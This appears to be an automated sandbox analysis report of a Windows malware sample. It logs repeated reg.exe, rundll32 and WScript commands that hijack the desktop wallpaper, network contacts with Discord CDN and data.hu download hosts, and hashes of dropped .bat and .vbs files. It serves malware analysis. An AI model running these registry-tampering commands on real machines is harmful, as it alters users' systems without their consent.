reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ddl8.data.hu udp
HU 217.65.97.75:443 ddl8.data.hu tcp
US 8.8.8.8:53 75.97.65.217.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat

MD5 e5097bb73edc13e33242930a46f4e976
SHA1 1e644b0f44a4e1ea3612a3adea61d2a984f06605
SHA256 97041695f1a22009f88d14a0ab45b61f6ef0c7fd962af2e7495de690df27cbe1
SHA512 7581babda9be534dee091cb9d3bbef984ce0d7c11accdf1fcf409d446c156ba56759c24a822b83e9d9c5413702a99733838f6ed16b3d2e3bfe6ad03c5fe44a9e

C:\Users\Admin\AppData\Local\Temp\26921.vbs

MD5 17b8608905bad5079f8ef5d1c8b9aafb
SHA1 65864828c6bc101e9234453e0be83b46868f96e7
SHA256 4d909b6c65777ad719bf85bd5e9de00739b962f2c0bab4a49c0c31fa268e93fc
